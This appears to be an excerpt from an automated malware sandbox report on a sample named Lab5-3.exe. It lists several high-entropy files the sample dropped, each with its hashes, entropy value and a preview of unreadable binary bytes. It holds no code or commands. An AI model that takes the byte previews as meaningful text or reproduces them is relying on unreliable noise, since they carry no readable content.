                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2336
                                                                                                          Entropy (8bit):7.9244773629384095
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:XiO9gsV4ec2BQy8SoIXKkFWZHfUTid3hBaUoSGFcmeykEdEElU92i:yFsV4ece/oiFWaGx0uKeY2ElUJ
                                                                                                          MD5:53294C77A6D9142C01F9513A5455E94D
                                                                                                          SHA1:0F02856C4D27543FA18D5ED2EE02A5037CD7E85F
                                                                                                          SHA-256:16640741B6D64FA78085326B78C31C95B1E95319D5001F916A1B0CDE3ED54FD0
                                                                                                          SHA-512:EB2FBD99361B9BFA4864C1DBFE44E43451B089EFE5917CAD7636AE6FEF73E910457DD22C40AC87FB1808F706FF28D93047E4D1AB087EF088FA8D6AE95F045B6D
                                                                                                          Malicious:false
                                                                                                          Preview:..".mt36,vu.....O.M v...Z3R..o.....(..B2.....]....o..G.{o.."..%.].I}.X.-...c...m\2.U9.-......K_.BX.C....= ..<.m@ n.....I.r.?.Aa}.\D.8Q^.N.U.X..u.i....5...}9.AF2v....O.....-bf.;..'....[tl.t.....p.P. -..U....D.Q}r.T^.M....~.8...<4...V..VS.......z4...s..$C..b..Sp3.$....;..WN.h.c.P.+(>>./>q...M......7/.......L...T...R:.. D...!......E.!.R.w.B....!...y:.-.X..3.Mo..m.....?......O....R>12.{....#.z.........+....M........4.....B....F.:..I&.E.....IG..._.g...^/.z+\......V..7..w.eK...2Y.cY.........nv.E..Z....G...........4...V/..........K}zM(X..sa*Q..Tc._,.\.]'e.]Y.0..R..&~<...b.......o.Z.......],.&.&...-t..F.....v.cg=./..s......h....L! .,.>p....F.....~V.>Z`...=.....z.8.b.P. t.".W....i\...C...UBP1 i.?..q.S..6.r.)O.I...#.l..%h.<.......(..g..oa....$.r )5..}f..@.... Q.}........Y.fW..s..|..Z.!..T..'s..%.s..da.....Z.I.....o.e"x.F0......>s..&..A....UQ.Bo`g^.5..(.!..W..'..+].......F....a...wI.<...!......7.u..g...!....W_..)..A.k.....wD.....A..B...=.c%...`..`._
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2336
                                                                                                          Entropy (8bit):7.919887064537739
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:i/l3BOlg9MOvdMUEduaywCrKcHfUTid3hBaUoSGFcmeykEdEElU92i:MfOlg9MikuaWrKbGx0uKeY2ElUJ
                                                                                                          MD5:72AF54128EE06D0446E56EB7ED0CBE09
                                                                                                          SHA1:678B6DEA7C2C4F9FB427B994DA0CBC2C90551CEC
                                                                                                          SHA-256:D6736D456F91D16454629C3CDAC463B49330F5E325799A29206B65A03BA55B17
                                                                                                          SHA-512:61C5F71CC55A8BE4623B4B37D7EC756AE2DD3517CF81214653A380159BD6F9BAB52D82004AB223FF1EEFFDEAA40BFDCAB6E578E5B2F1C6699A03489C68C036FE
                                                                                                          Malicious:false
                                                                                                          Preview:8...0$......^....V....d}\wT\.l.{. ..$>.`...`...\9....T.....3?P....'].W..U^..Mf.H....Jk!.....8.Eq.P....|5.p..g.....|.7.;.Q..M..0..m*(...Q4...g....$.7.I.Q*....6....7...tB..(+6..."...).....e.......>..}...6.#..[z.....!.,&.j..uJ..X.*;...6.!.O.4.........E.....j....Q..X&w/S.[...B..-.k..Q..K~...PuT.`v.\.^.m...........<.......q.pGJ.....B...Rtb.+.C.......6.i'..=D......M.xJ.......~8f.)W.A..R.Q....7V\x..%u.jz....H1E........O.:...[.........bO4..mp.d....".).G..*!..=...3...o.?....,.LH..O.k....*~. .._.......E...iNQ..#.6)_.7L.&p....3r%..!..\.....1....$...9mI@,...I.....&X......X.Q>.n.7.L..a!.O..9.Ub.`.9.:I...4........}...&.......o%..?{t~...).OpEAq.y....Zk.l.`%.O.^Q.....m..<A\...ui...G..uE...R..cSs}.!L.@.......N..t.`sU..G.J...h.....~P^.<.m+T.TDR....)^.>i}.+..*..rsE...T+.......:.\.....oN.o...6...k..7..e`.1Z4.......7......H.0..M.u.Rh.U<.MQw,?..?...P.L......f.?*..Pg.t-.f.....u...2.S...t.Bq...u...?tcj.u..lX.DJ.XS......x.Z@.G.sKN...EJ...*K..p.....Q{t.!...b.b
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2336
                                                                                                          Entropy (8bit):7.920453712394139
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:V8XTFFzz49+jtFACZEmdNGHfUTid3hBaUoSGFcmeykEdEElU92i:VqTc9+jtYm5Gx0uKeY2ElUJ
                                                                                                          MD5:39BA9934044D276FDB85D42CB1453E30
                                                                                                          SHA1:4301E9E48319C8F2DAB19033B7F3A081CEB39D94
                                                                                                          SHA-256:B36657DD380931DC2238800B4EB46CEBEF0B095DE447319A0EBA1EBFBD97017A
                                                                                                          SHA-512:7E202337210DD5FD939959AA79F07BCBB59E65834B7946DFBEC12C71CE9C813D6BFA9AFD93695CF19FE17E6381105158E146A5B29EB32497128A387D770B015E
                                                                                                          Malicious:false
                                                                                                          Preview:j....,a.&%z.3.}o..f...k..w.~!...."YXU.....r.=..jF.3V.^.......<.T...&.;.6Vv......a....=..../..0..... ..h.-l......U..=....s...".I.T...D9.<u[h=.M.#xu..2...lO:...Bn.....f..M.03*^.?wp...mEG..b...-\...:z...q.G:.\>.?R..'M,.:.#pQa%+aM.]8.......n..9.a.Q..0...t.E3I...:.~E..f.t.&.....*W...Q.c&...k..7...C[.yish.....?....d....NM'$...{}..A....]j=b.D..pS{.......~.1.+...!..........j..*....c.y*9..L[.....1d.....$U.7...hYhL-+S<.^.m...i5..o......^.8.Wml........?.........Q..5s.R,.>...w..6.G...T.......4.D...y.E......2...N.....S./.....5....K...B....2..k..O.....Y.x9..E..&".|.+...G...[...gw....{..a`.|~....8.jh.....jN..V.....+Hq.?".q.m.f.^"...uaj{g..........E....|....C.<...Ht.e...)!.....T-E./@.CQ...../.A.. 0@..DJK......j[............z..R`......5....ZT|~W..t.4.Y....B;J..D.......R...k=.?._..B.NL..ew19....A...#.....z.f..AvaZ./$ .{.D./.,O....,..t;a.J........p.U>....x.VvHX.v....d.Q..M..:Z4..W(.Pso\.m\..%`n)o.h..=e....a\..ji..JG....t.^..-8.:.&[.]rT.[...5...$+.9np..c..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.929721325972743
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:SwqpjMA68NwxY9HKnOPjebAsBHfUTid3hBaUoSGFcmeykEdEElU92i:SpJh68ixjOPFGx0uKeY2ElUJ
                                                                                                          MD5:CD3016639583D1CEDF7F34E2DB91ABDF
                                                                                                          SHA1:6C7C252416C21A76014B2EDCDFEDCC6C5FABDB6A
                                                                                                          SHA-256:083596216EB7781168B859155A3DE1B465654DD54A81B5071B488622EACE7651
                                                                                                          SHA-512:90838AB5276A16345156A00836601D78BBB77B4B78756DEA50B5D76E7653E6D9F34809118132A224C75EAAD25D01833758DE6FABA8B79C5BABF04F51AF18E5F1
                                                                                                          Malicious:false
                                                                                                          Preview:..._...PR*!.....h.x..m.....?..V..........I.....j.M.b.../........T....z?.......^Ic...e...8......b..[+,.....b.........^r.2.a.?.......>...A?.......O.H.?'....!.@Y.......).....s..+.4.~.Q.G..b..-t...{O..>.........{.....k.E.~..i.d.......gp.@.'-.`...M.9.|p.O.V........C..P@..{.y.v..-E./r!I..L...._bA/.E.F.:..Ew.I.....<5..&e!.).V..r.=..ECG...P0.?-..M7Dvx...y.M9wp...Y...-....j#F.;..%.i.{....tX.....L.B/L ..\.M.x{.............&.......,ax>..7..9...,..G.'.$..r.\u..I...#.D..........Q(K.d.w...:.........;nk.&'.^../T................!z|.7....x.J.5.....&...c...r.j*.{j..<1.k....l........J.../.X:.!p....E6".....x..6q.E.,N"..F......E.E.W.;..j:......(:...^n..)#..#...mw62..W..4?.q.Qn....C.."o.SR.%....v.C.u...7..8...\..._....h.b...f....Fq.=^Ud..9./"..w..F..G..yc..R.oo..L~J...!./P3.?%?<..,.]h...]gh.^.H.*U...79..I..>1%.gH..N"..8.D-.rB..vL....Gh.F.:.+'.5..3..%k@.Hx..I.NP.V...Xu..#..J...r.......B.:O..c.W;Y.$1..i..{..m.%..y................d..9.|.9c.%..+....>..&.C..[.J.0./..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.933410024661453
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Up9hVnAiRSk8w/k3Yr8niQt6jmn84HfUTid3hBaUoSGFcmeykEdEElU92i:O9h1dXQYkkjZGx0uKeY2ElUJ
                                                                                                          MD5:12BDE7EDC5D29A355A4422AFBC4D06CB
                                                                                                          SHA1:0AAB923F06CB02B4821978CEE265072352E8D7FF
                                                                                                          SHA-256:C6D0C3013A6AA6C5DE7964393CE6A8B8F54D27B3336585F0BDD1D114C69C29AA
                                                                                                          SHA-512:1F965A39CBFCC0366A040D8826BBF34E5CBD637F7B8066E9653560199345EFC49C5E29459611DBBC3EDCFF9CE9694F0E714FE3F9AF3DC53E12E2E851A090D4A1
                                                                                                          Malicious:false
                                                                                                          Preview:..AJ.*.P.N...M...1...d.......zFH...wc:s.EZ.....ZN%._.(.<...*#d..L.j..,.'r%XG...e.RR........2....;.'...G.v>.R..Qbm...5?.K.].....~.... ...R.3..T/.Y..R@....q..#k..._.3....`E...uDjt.{.U.}...?{`..5..Z.W...<...*J.7..1%...Sg...;.......P.4.rU..JZ.....E.5....."..M..W#......9.D.R....YDt.....0.z..`..b...V.z!Q..m...........X..b..5......2..O\.v,d.:.R.H.,%.....dB..;.9.....d#j.|u#..M...A....gL.K._.$Q...4.'....v..8B|...E1..HQ@M.,I>XE..........9....s...<p...X..[.fT.&.......7}.OCo]S.0..e.W.r....\*...Y....V.w.........nZc.~.a..;_k.iSU...*c....^N...3..z.f.1....[....7.jf..t.D_Y[..A...|/n.]A+.0u.............>m.\.`.*K]3"vW.U.Kt..c"...Z.G....|h...I..X..4..<.|Jq.^..\..........a..&..+$..H/s.....[.....nq......l..r.9...p^.[...s2=..B.j......A.1...)...p./#.5.I!)..O.......).Z......s.Y=..i'...............>P.m.l=_!....`....'.n7.+?.m^.d{o.`r.J..l?.?.c.....y.K.IX....^l...6.@..>..k......3.d..|T...#...U..s...a...hte..].%...0|#&.n?l.....A..3.E..T.7l.._k...19+.-.5...4.*.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2544
                                                                                                          Entropy (8bit):7.9325011795157785
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:y03FT6863npPw8XnkDraDkTqo7ZivHfUTid3hBaUoSGFcmeykEdEElU92i:X6r35nki+i0Gx0uKeY2ElUJ
                                                                                                          MD5:9F907B14F7FEF826275895F77FDB99B3
                                                                                                          SHA1:834298ECBDD7DA6030C29EA78D4CF53CF7059D25
                                                                                                          SHA-256:D9A0CF3019F4D24622CBB9A702B6EB4B0FB2848B7EA900296046E65AF92FC9F8
                                                                                                          SHA-512:8953F7E66D30B1DFED7105E13E8A01D2055B303DFA3F148524324B216B9654595071BEE3350550FCE8E4F4B0E6ACA2815181D2DDAE4441DC95A86FEAA4EF449C
                                                                                                          Malicious:false
                                                                                                          Preview:.%.....H....f..J.V2>2e......,..H.a....F...).F.....#Y.}Fy.......^u.W.O.4/.[.bY..3...*.....Xy|^........5.O[..8...|G.Di,.n.."<..,..,7.x.&....'V.5.v..{.ec.aU<.Z.o..0~KP6>.l55a.7TAM. o..Z..$.(T.....#^.'F;M...Kj..+j.P.q=...L.u..NB..H..`.r.}...".x........*X2..x...`.t..}.R.Fw.-.[.....e..d..Zs(..,8.El2.6E.vE{J....b)...!Bf!...$..:..@..B...~=....|...y...,.....4`M..}U>.9hg.H.[..m&.Y....1.N..O...g..m.\EXI(~..Y...1J<...>...o..b.N.dS.J.'#.~.Z.0..PF...|.._bD."b.....I.n.<.sld.0............,djv..6.\]e.......^.Y...._[I.l..y..k..S.X....b\....:....7.PCw....0....;..CeD......h...S..u.z...KB............N....f.*........mk.....l.s.....d#{..Yz7:...DO....n.#v.....^;l..~.nF..~.b.:..........\.fL.....O!.B3....%4<..M.........c..v'..Y S..TW1..t..,....qG..."+.....J1U.*.Y....*n.............5..3...^#.....b5....j...i..kR.]..77\......3.....x....m...S.@....*un.......4;...6<m.q..#pw./....^3.V{C.]6l`..u.MZ2.h.%.{....?.?....!l...I.U...'{.w...c!.......4.6.~.....^>......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2208
                                                                                                          Entropy (8bit):7.899883854978672
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:sOuur1yvzcre7K08J8EK+WRHfUTid3hBaUoSGFcmeykEdEElU92i:n2QeWHyMGx0uKeY2ElUJ
                                                                                                          MD5:858DD15D8C9DF4BF6E9956F27EC1E0DC
                                                                                                          SHA1:F36EC14E9C5E544C08ACE5FF5626E9006AFF401B
                                                                                                          SHA-256:24114BD2F313D6137BAEFDD7A8627455A8E14B7477EF906875D5DFE5B65346A1
                                                                                                          SHA-512:FF1538C419D63F743E9917B452EEFBFD9F95E802B66BF86B9C2CDD07F81E870C4D95EEAB06614B8A71D6B002F5A537F985E98941C67574D7480DF254E20714E8
                                                                                                          Malicious:false
                                                                                                          Preview:)1+tP.%)..BDh.c...*Z.....6H;..XP..h..N...h3...C.".....9a.P2...o...e..|*.,.pv.P..-.~......M%...2.Y../.9.m6Ue..Q.|.qw....7C.-...@5.B$..#....l.)}t+.{..$.C^..c.1.{Nz...[+.C.l...}...v.B.....D.D...............N.........G...Z..Z'.q`...C...../eT....5.<VB.....@A@.o$2.eo...e.......F.*.......H....X2i......I.P....*..m.3..$..I.W...F,Q..}...h..QqV..\.\...>..n....j|DL.Q...@....-o%.]L.Z6.R../.I-k_y..F._h.Y.$d....vB..+......d...%~..t.....fu..BtQ(.bz=....SH..g."P...[.E.B.{......[...O.....}[...7..6T.FhK.T&......./I..>^l;t...$"..-.J.Y.w$.......N\.......jp.A...%w......F..6.m@....?..0.L.v..C#3b..{........=.8.............-..~P..9#!j...(..V..7.K.S...T.r...}0....L..f.....H...y...u....7.......6....$.ow.....H..;!.(...O.....1...6.0....R..(....+9...S.(..-.Ya5..E..r.C.....~7.0.....L..3 .N...D..&..=9.FM.?im.;....F.uF...l...|.sg`.#..7....u..oi.. .....F.Y.MO..%.Yv.W).0...6..`....\...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.922317332631225
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2c4U76+d+tpI556wqhDYeHfUTid3hBaUoSGFcmeykEdEElU92i:2X+d+c5NQDYxGx0uKeY2ElUJ
                                                                                                          MD5:C76F07EDA91C6832EC32765A54B26CED
                                                                                                          SHA1:A6D93813C2B1C85B15C5940450A45A634973E348
                                                                                                          SHA-256:59BD239E239F742261AF7E821AB234F2E67123405583056CD1D34C35957DA92A
                                                                                                          SHA-512:38E6CF393AC31DD19A596F2E0F88851C596C7B788AAE2E81FC88AAAC00FD72C0A989D4EC02752356F38B8D08A27142E18F93E9E418C3C01563E5A18D999D7A99
                                                                                                          Malicious:false
                                                                                                          Preview:7.TWg_/ .Y...n_....f......J....y#.Ur.:..C.xC.y3....kz.../..F.|..m".H#...z....!..x.....V.u....k.$.r*.]M...s..P..."...vPkh$.)...C9..B..X.D.....(..+e.%........6L..o*...XZ..$x.t..}.O.......a.aZ..lq!u9.'\.u."..w.q.D..xU..t....M.....h....u.Fq..O...ln.........q..bL...0.!@X.c`(..L...... .ZDG:LX.Z.V+Q0..g..]t...brA.L..]eY..oB4QfEM....s.;.}N.;].L...".....]e.@S.e.IX0..S@.n;+8...8@.o;..l./..)}K>..B...|.f.+e_.K./.m.v..8.e0.wZ....Htv.Q.j.<.J....`.........9......"...`` ..%7-..$\t...<.d...F.K..... .$...<4..?....e..c.....BK...R[.q....F.Ay..bu..u..*...?k..[......M.Pd)..6./x.O.......9[.6.i.kI.+..B.........O....5...tN.`..F&..X.......2...h.....*...:.2g.2.U.M.....0...NZ.9h...=.~.\.\K]M.N...\.(;...@06.../............kj.z.....pJ9....MQ...<.f...f5..(.hY.?....G.|.3L.#.,.C9D...UZ.=AZ.!u...@k...Wd....^.z.T.C.....w.-.J..j_'......g.>t.........0.D._;..?.D.`VA.a.-...AN ..=cG.G.f.h.+.$.`...,..aJ!.3T'[.......8........#z5'..lC|R..q$.I.....O..|....3.`+.'t...3.)._=....{."..=...O...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.918483188633318
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:RPV6NV2az1f1pHfUTid3hBaUoSGFcmeykEdEElU92i:RPV6T2EnqGx0uKeY2ElUJ
                                                                                                          MD5:4A3BBF6C0C83F55F7221C55AF4A8EF01
                                                                                                          SHA1:F5D434ED56F815F345D3FECE743F56A816391E4A
                                                                                                          SHA-256:B36D58157B217A254151705545D866029DD5504C2DDD6B0B61B2A09F4F7463D6
                                                                                                          SHA-512:1BE64DB1F4D43A45A234219B283AF71B27117165C964457D1B2E47CA1A7F2C3CF572C7E01A82AE53E3FBB24AE6893C79B1890E458F9A1F033E288E79EDB9B789
                                                                                                          Malicious:false
                                                                                                          Preview:`k1..mK.s...gh.....R..F.v....>..t...Dc....`...dL.Y3&._m..w=.Fp.0.n..}.H.^........?.......i.J...U....6...p..>.{.g.....Cn.'.O.?Y}.@.>k..g.o.Q........-..E!..x...q.jZ]U5.Z2.,.xqMC.9..m.zBJ`E...jwbX ..+......n.>...Q.*.|+..!l.d|)...a."\.....j.Q.cI....ae...N7..f..^3.,?....'....-Ny..T...|...*..5...<..Yr.f..e. z.z...~._.....d......j`.K.j..>...Tb+j2.U...}....:B.*gfF.=8..F...0@..s'p%qE...S>...6@.d...It .!.L.B..gc)..g....ie`i!..0F.R+.z...eE.(.~T..v...7....Br5....P....`J...G..k...8.%f,VsE~d......q{m.g.....c!r....8{}..N..;..7....#.. ....L........R.4.....A.......b#k..C.} .>o.U|:.1...)..-..fa.......,.1..!.g..Z......K?...J.SK..O...r.}M...a....8.v..&......&a ..d{...DH._....gO....+-..'2..f.i...<....-.y..{B@..L!}`.'...}...L.......!.p.........C"_u./e...)nw.......|Sok.........a.s!..y)~..#...!.....d...n6.CO....i..dh.R.>b.F}*..U.>....$.&,EM........g...8.>.PWK....N..N...q8^.....om..qz.G..0J..CP....H.:..s^...XX#r.V...s..t......{....~.I.W.+^..#..YF..yZ.&Z\G..,Eff
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3280
                                                                                                          Entropy (8bit):7.948493939712975
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:h41VhnWMUKMhe5jIEu9QRW0JmBmGx0uKeY2ElUJ:21ST1/bQovv0Cb
                                                                                                          MD5:6137FA33360B0450F3891574F35790EC
                                                                                                          SHA1:B735447D668B8BCB24000E82C16313E722FB38F0
                                                                                                          SHA-256:78337000AC50D9DA0AF48BEAE8D2F578F7C7B830B0F039AFD962AE42242D4CD4
                                                                                                          SHA-512:ABEFF6FAE5D13FF84B91E136642532B3D1626DB4C0D0A5FD39CD93C0D8F4CDE3CC7789E4B588E596737749FF151420708BCC490F0980989FC574C97D7177ADEE
                                                                                                          Malicious:false
                                                                                                          Preview:.>>..E-.w..Zp..\..=./p.d.tI:zM...b...q...Z..~.B.u...I...Z..Td .cr.|......P.i5.?.8y"..N.j...8..N#.){$.A..>8....B..u.6.5...)...F{.....I..3.X...~.^...sq]#...rB.......5.G'...3.P]...e.y.Zd?......Fr\h.Dn.w./o.....?.\.Q/.....=.uQ{...PP..8...;....1.2{...D.c...,...X.....F......4<......W.'..,o....e.....A..sr ..w...2.v2....>j.A.d..B....@.94."(..l......+"x....T.z..7.C..M..H/.....I6...vw.9X...-.H.nw...B.a....?LE.........X.Q...Jt.......L........3.g...p.5.a.....KWB......j.'a.iRw...... ww..:dX.U.]..;[.T.:hx.^....Q....u....\..f.e..q..J.Y,.G...[............Q........*. ,..1..M........b.....*.p........U...8....~Y{..#b....e...k.....h....W...l.Y>...RN..A...L.z.j.U....Ck...|D/."..3..f.d.t5.t.wg....~%.....\*.....uC.R.[n....of..9.(....\..1.......O].........R......{..l..)QBu..].D.V;...Q........(....9.9V...Ag.l.(..B....v4a.<F.k...X.'2.7.........1....5..$.kv..^M{..c....[.N../Z.,......A<.`.T)....01....P[ l..0x..N.N..vH.........X..E.|BT.."tU......S....l....+.IZ.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5152
                                                                                                          Entropy (8bit):7.961135225731073
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:vjaLMy2ez8YhabKYyIDFE9I95NkntJf3OuflNDrtKlGx0uKeY2ElUJ:veLBM2bI0I95NS5OufnU+0Cb
                                                                                                          MD5:EE55C5FE67F6671D7411BCABE9D9A6F4
                                                                                                          SHA1:36FC2AFFD3D72B085E1931992F119737BBD480D4
                                                                                                          SHA-256:AF04C4D2E5CDF2F0DA2674C6C3A961C4EC670DF037B451094E2303C640B7C440
                                                                                                          SHA-512:0CA79B6F14DB5E24BFD77D1EE83563FA6EF4DA73F437E1088E0DA41AF32A9A11AFDB156D84ABDEEAADFA8E0F46D25B76F200BAFC5E4F5C2E5A611101D6786F1F
                                                                                                          Malicious:false
                                                                                                          Preview:2..?k.fo.r......]..2.~.....|.<W.%.3/r...Mm......M..bH#./........w.Y..fP#w.B.t.CI...F].q.A...q>....|.Li..B....f."...E..h.&.....].b...y...0.7....U. D1.."..,.&,.._..../.......lG3_..?.*..Ke..F........8.t.;K.o..........r~.....lEu...+7..O'*PB....Rz.d.B+D....\....Cvc..{.&..#.....a>B`.6.z....e.m.[7.D....>...pg1W..4.42.p......<..5....c......^#@...KM....\..9..e..._.T.orB..{....,...H.c.=wmP.b...c.[..}a/..YU.^.+.U?.`Pj.....Q.f7T8......8=.R...`..x........>.......m9[V.<..[M....}*..V,N.>gX.g. .N.N..8.5A{....f.92[{.JB.p;....s..{t[B,..."..[.Ub.'.....o{.\.....L].!.#....7.<?..w....i.... ..|.......}...ivRh....N....h.9S.2.e.2L.)...z...%EX......O.a#..1.q......S..k......7G.c.X.....`]/.'.C.[..z.i..U....y.P..X..`&...H..v...?..a4bw..I....v.Pkn.S.(JF$.pA........93.....$....}.+6ZOaa(..`..?.6.......z........S8..a...mE..%....x.e.L3tzvU0..6.F.x".!..K..g.....&.<..v/..r.I.F..c..e..........F(A...........-..'+;:G...p....N<.....\@..2....v.1i........D4V.....xR....Y7.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2512
                                                                                                          Entropy (8bit):7.927239303073175
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+6psM39B3VTBes50NGXBR5PFxxKbruvHfUTid3hBaUoSGFcmeykEdEElU92i:+6p39HFegBRRFTKb9Gx0uKeY2ElUJ
                                                                                                          MD5:99D447D2C31FE987C2F0BA7FE2DBF860
                                                                                                          SHA1:FBEEBFC5FD70826D73C99B802B855175B53B4FE1
                                                                                                          SHA-256:E0465E5422FB295B0DBFAC0FDB1B206A0F022213E2C30E57FA42C025ADBD7E17
                                                                                                          SHA-512:9C809372265752B8A73A49CE6B7D1C877AC71944085CF9570EE4659D33268582ADD839BDE30EAE7E60A47743B870F55DF5E0ADD6994E8EB11D643CCF5D8A937F
                                                                                                          Malicious:false
                                                                                                          Preview:.c.n......a\.]<.>.$....[:.;1.o$_8.............V...w..mXP..^...V.'/."2.....x|+9..9....S..D..X^.A.....q.c..'...E.'.u.$#o...Qie)....#;..m..(..`.G...-....b.=.B..M...Q.w...V.ep.5.7..J5..).....h.$D.`.G.aR.E..7t.M.C.gm(^..s..OD..S .ik."x.u.I.........KO...V4.3.R.R[.R..\.V...&...C.....p?(t.)._..wD'H.W@..%..).'.?....c.V..&.fVaQ...P~.<.,...;4.y.H......@./y..$.P.H....C.w..T1a...1dH.`..-oDdO..l..-...._.Z..(.S.B..U...bO... .....DC..(!.~.....&G.!.._...8...*'..,)..%.{.d...y....GVpg.<.,.3)%.s.!x..I?..|.MG..h..$..k.;8 Y..\...v..my..s:0YX.B$1..3A<(..8Y......1..5k.v}*.k.M{t.V.v.GY...^$....m.a......"..G0.....B|Xuh..^.,..G.....l..*...P.w.}.b...M;.....'2..........6a.ew].s......=w.....S..E.j...K.^X.D....e5......;s..GE......<{..#Q;.l.8....+R ..U....V./....)z.l..........f@*|..Y....8%t;.0y......~N...G....:(......kJ.....[..J..y....O.....P..?....k|.Z..^%..4%W.h...{...w.w.V.k..U...U.............P.<...Z^..+ ...~...(......o...A...N....Lt....>.}7.K.W.m.%.\S...gE.48|
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3904
                                                                                                          Entropy (8bit):7.945228494274021
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:LCiaFwlJ2EUW2D9yEvGY+NSwoSgIH+vPFGx0uKeY2ElUJ:4xzSStSlHWPe0Cb
                                                                                                          MD5:0E4329F11D5258F6E267BE00408F3026
                                                                                                          SHA1:BE74DFEEEDC5AA950C3EA3D82BDF67F904FBDE9D
                                                                                                          SHA-256:425BBD564D22F042F292B02CFE6554F7DE8E8D08A6517505626D35D089A63D3A
                                                                                                          SHA-512:BBD53BC161CDB99F52A9C052384EF56164A7099D4ABF7637A6352C750F8736244EB97510E42D7206DA7BC5420DCB9B986A4A4510E3F63A15816FCE75C4707093
                                                                                                          Malicious:false
                                                                                                          Preview:{...1.....G3.#.OP..q#...6>...PM..u~.o..5...o..1....N....n7...w..]..%.7.. t....;.....|dC.Z).....;.cC..H...B..V......-,..O..|z.H.\xj....o...#..D_<........2.:..X....sy1..`.w..S{..j.?S0";.fq.9<v...7.......qL.=..mZ.6k..is..........9-+.oF..t...^.z....OX..p-....5[.....H.........m...p.\.%U.....>/....E.@.N>..@.I...i...Bx....-.....p...?o`R|...j..".P^.[.{YV1....A.x...?.c...V.5Q.7..uV>...x.Jg.....N .......0 ...R.@..r..`:.....s.-w.:J.B{j<....D.\V.|.sY..G.%....2Nc;..,,).j.n3.. ..|..U..'.dh.Z....q.e.t....oY4A.....`.f%....c.B.8...].X..r.f|...R.....?.O....."[....?..^.I.".f...../..R..*.........!Uqe...1..B.....NL.:.s...l.n.i5m.....kDb.W..N;.. ...O...8vh. .|;.uc..{....D/..x.gm...6.k.h.qf~...H...Q.8oR...I...r.....>,r.s..v.D....D;B...2.\./.M.f.g....0~.....JbjgTq...J..HL-.9....T..Z.gT_......!.&.`zQ......n..~..,....1..@.r.hqzO.|;.....ys?GJ.1.a..]p.%OP.../|.E..6...."EU....e..K[..Z......!.....,...&...Lk'.......f.E.A=/.....V.A....E,z......f.L.p..<}
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.936629966188249
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:9WEmyclbs5XII55v8jRHfUTid3hBaUoSGFcmeykEdEElU92i:wERclbtI55v8WGx0uKeY2ElUJ
                                                                                                          MD5:78F722F6D85B57B23BAF42E55D10A848
                                                                                                          SHA1:53E3C4E8564BD5B139234D89B5D1FA6F72FED53A
                                                                                                          SHA-256:DF0BC517A6C851F7000BAF5E423C028DD2C58BBFC33E8F6BF4AF10600FF624D1
                                                                                                          SHA-512:969C967D667666AD8F98EF995CC4A5E34D0D8C2EC14DC0AFCB08679649FA74A6077A0EDBBE46B3A83D2E2A791B12DA6956F1ACAC13325D4F703E3588E60C0B69
                                                                                                          Malicious:false
